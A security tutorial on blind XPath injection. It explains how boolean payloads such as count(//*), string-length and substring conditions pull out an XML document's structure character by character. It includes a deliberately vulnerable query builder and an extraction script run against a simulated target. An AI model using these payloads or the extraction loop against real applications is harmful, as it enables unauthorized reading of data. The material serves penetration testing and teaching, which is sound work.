Blind XPath Injection

1. Description

An XPath Injection vulnerability occurs when an application constructs dynamic XPath queries by concatenating untrusted, user-supplied data into the query string and then executes the resulting query. The intent of building the query through string concatenation is to include the user-supplied data as values in the query. An attacker can instead craft that data so that it is treated as part of the XPath query itself.
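The pattern described above can be sketched in a few lines of Python. This is only an illustration: the function name build_query, the item element, and the lang attribute are hypothetical and do not come from any particular application.

```python
def build_query(lang: str) -> str:
    """Build an XPath query by naive concatenation (vulnerable on purpose)."""
    # The user-supplied value is pasted between quotes without any escaping.
    return "//item[@lang='" + lang + "']"


# Intended use: the value stays inside the string literal.
benign = build_query("en")

# Attack: the single quote closes the literal, so the rest becomes XPath.
injected = build_query("en' and '1'='2")

print(benign)    # //item[@lang='en']
print(injected)  # //item[@lang='en' and '1'='2']
```

In the second query the attacker's text is no longer a value; it is an extra condition inside the predicate.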

1.1 Background

XML Path Language, XPath for short, is a query language for XML documents. It is used to navigate through the elements and attributes of an XML document. To do this, XPath models the XML document as a tree made up of nodes.

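For example, for a document whose root element is Employee and whose first child element is Name:

Name of root node: name(/*) returns Employee

Length of name of root node: string-length(name(/*)) returns 8

Name of 1st node under root node: name(/Employee/*[1]) returns Name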
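To make these expressions concrete, here is a small sketch using Python's standard library. The XPath subset in xml.etree.ElementTree does not provide functions such as name() or string-length(), so the snippet mirrors each expression with plain attribute access instead of evaluating it. The sample document is an assumption: only the names Employee and Name come from the examples, the rest is made up.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document; only Employee and Name come from the text.
DOC = "<Employee><Name>Alice</Name><Role>Engineer</Role></Employee>"

root = ET.fromstring(DOC)

root_name = root.tag               # mirrors name(/*)
root_name_length = len(root.tag)   # mirrors string-length(name(/*))
first_child_name = root[0].tag     # mirrors name(/Employee/*[1])

print(root_name, root_name_length, first_child_name)
```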

1.2 Blind SQL or Blind XPath?

A Blind XPath vulnerability often shows up as a set of true-false conditions such as:

[existing-value] and 1=1

However, this behavior is easily mistaken for a potential Blind SQL injection, which leads to crafting SQL statements to fingerprint the database (MySQL, SQL Server, Oracle Database, etc.) or running automated tools (sqlmap, etc.). Some scanners also report it as a Blind SQL injection, which adds to the confusion.

One check (there may be more) mainly helped me identify the issue, to some extent, as an XPath injection: a condition built on the XPath string-length() function.

Note: Some databases may also accept the "string-length" syntax, so further XPath commands should be run in order to confirm.

1.3 A Few Commands for Blind XPath Injection

Using the so-called "Booleanization" method, the attacker can find out whether a given XPath expression is true or false. This is similar to Blind SQL injection.

For example, suppose "en" is a valid value. The following payloads produce a true and a false condition respectively:

  • value="en" and "1"="1" (True)

  • value="en" and "1"="2" (False)
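The true/false comparison above can be sketched as a small detection helper. Everything here is an assumption made for illustration: send stands for whatever function submits a value to the target and reports whether the normal page came back, and simulated_send is a stand-in that imitates a backend placing the value inside a single-quoted XPath literal.

```python
import re
from typing import Callable


def looks_injectable(send: Callable[[str], bool], known_good: str = "en") -> bool:
    """Return True if the response follows the injected boolean condition."""
    always_true = known_good + "' and '1'='1"
    always_false = known_good + "' and '1'='2"
    # Injectable targets answer differently for the two payloads.
    return send(always_true) and not send(always_false)


def simulated_send(value: str) -> bool:
    """Hypothetical target: True when the normal result would be shown."""
    match = re.fullmatch(r"(\w+)' and '(\w+)'='(\w+)", value)
    if match is None:
        return value == "en"  # plain value, no injection attempt
    lang, left, right = match.groups()
    return lang == "en" and left == right


print(looks_injectable(simulated_send))
```

A target that treats the whole input as a literal value returns the same (failing) response for both payloads, so the helper reports it as not injectable.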

The following commands are useful for retrieving the XML document:

  • Total number of elements

en'+and+count(//*)=<value>+and+'1'='1

For example, if the document contains 100 elements, the following condition is true:

en'+and+count(//*)=100+and+'1'='1

  • Length of the name of the root node

en'+and+string-length(name(/*))=<length>+and+'1'='1

  • Length of the name of the 1st element under root node "n_root"

en'+and+string-length(name(/n_root/*[1]))=<length>+and+'1'='1

  • Name of 1st node under root node "n_root". Test one character position at a time, trying 'a-z', 'A-Z', '0-9' and other special characters (the comparison is case-sensitive).

en'+and+substring(name(/n_root/*[1]),1,1)='<character>'+and+'1'='1

  • Length of the value of the first occurrence of node "n_name"

en'+and+string-length(//n_name[1])=<length>+and+'1'='1
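The commands above lend themselves to a simple loop: guess a number until the condition is true, then guess each character in turn. The following is a minimal sketch under stated assumptions, not a finished tool. The oracle callable, the CHARSET choice, and make_simulated_oracle are all hypothetical; the simulated oracle only recognizes these payload shapes and answers for one known string, so the sketch runs without a real target. Payloads are written with spaces, which would be sent as + in a URL.

```python
import re
import string
from typing import Callable, Optional

Oracle = Callable[[str], bool]
CHARSET = string.ascii_letters + string.digits + "_-.:"


def find_number(oracle: Oracle, expr: str, limit: int = 1000) -> Optional[int]:
    """Try <expr>=n for n = 0..limit and return the first n that is true."""
    for n in range(limit + 1):
        if oracle(f"en' and {expr}={n} and '1'='1"):
            return n
    return None


def extract_string(oracle: Oracle, target: str) -> Optional[str]:
    """Recover the string value of <target> one character at a time."""
    length = find_number(oracle, f"string-length({target})", limit=64)
    if length is None:
        return None
    chars = []
    for pos in range(1, length + 1):  # XPath positions start at 1
        for ch in CHARSET:
            if oracle(f"en' and substring({target},{pos},1)='{ch}' and '1'='1"):
                chars.append(ch)
                break
        else:
            return None  # character is outside CHARSET
    return "".join(chars)


def make_simulated_oracle(name: str, total: int) -> Oracle:
    """Fake target: answers count, string-length and substring probes."""
    number_re = re.compile(r"^en' and (count|string-length)\(.+\)=(\d+) and '1'='1$")
    char_re = re.compile(r"^en' and substring\(.+,(\d+),1\)='(.)' and '1'='1$")

    def oracle(payload: str) -> bool:
        m = number_re.match(payload)
        if m:
            actual = total if m.group(1) == "count" else len(name)
            return actual == int(m.group(2))
        m = char_re.match(payload)
        if m:
            pos = int(m.group(1))
            return name[pos - 1:pos] == m.group(2)
        return False

    return oracle


oracle = make_simulated_oracle(name="Name", total=100)
element_count = find_number(oracle, "count(//*)")
first_child = extract_string(oracle, "name(/n_root/*[1])")
print(element_count, first_child)
```

Because the payloads only test for equality, each number costs up to limit requests and each character up to len(CHARSET) requests; that cost is the price of having a single true/false signal.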

Note: Referencing elements through the root name, for example name(/n_root/*[1]), does not always work. In my assessment, the root node was “soap:Envelope”, and the command “name(/soap:Envelope/*[1])” could not reference the child nodes of this root node, most likely because the “soap” namespace prefix was not bound in the query context. In that case, all the elements can still be referenced using the following name-free syntax:

name(/*/*[1]/*[1])

Note: "/*" selects the root node and "/*/*[1]" selects its first child node, i.e. book in this example. "/*/*[1]/*[1]" then selects the first child node of book, i.e. author.

The above syntax is also useful for automation and for skipping directly to nodes at a given level (without retrieving the XML document from the start).
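As a rough sketch of how such name-free paths could be generated for automation, the snippet below builds a path from a list of 1-based child positions and, for illustration only, resolves the same positions against a local sample document. The helper names and the sample XML are assumptions; only book and author come from the note above, and the root name library is made up.

```python
import xml.etree.ElementTree as ET
from typing import Sequence


def positional_path(indexes: Sequence[int]) -> str:
    """Build a name-free path such as /*/*[1]/*[1] from 1-based positions."""
    return "/*" + "".join(f"/*[{i}]" for i in indexes)


def resolve(root: ET.Element, indexes: Sequence[int]) -> ET.Element:
    """Follow the same 1-based positions with plain child indexing."""
    node = root
    for i in indexes:
        node = node[i - 1]
    return node


# Hypothetical document used only to show which node each path addresses.
DOC = (
    "<library>"
    "<book><author>A. Writer</author><title>First</title></book>"
    "<book><author>B. Writer</author></book>"
    "</library>"
)
root = ET.fromstring(DOC)

for indexes in ([1], [1, 1], [1, 2], [2, 1]):
    path = positional_path(indexes)
    print(f"name({path}) addresses <{resolve(root, indexes).tag}>")
```

Starting from a deeper index list, such as [2, 1], is what allows a script to jump to a node of interest without walking the document from the top.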
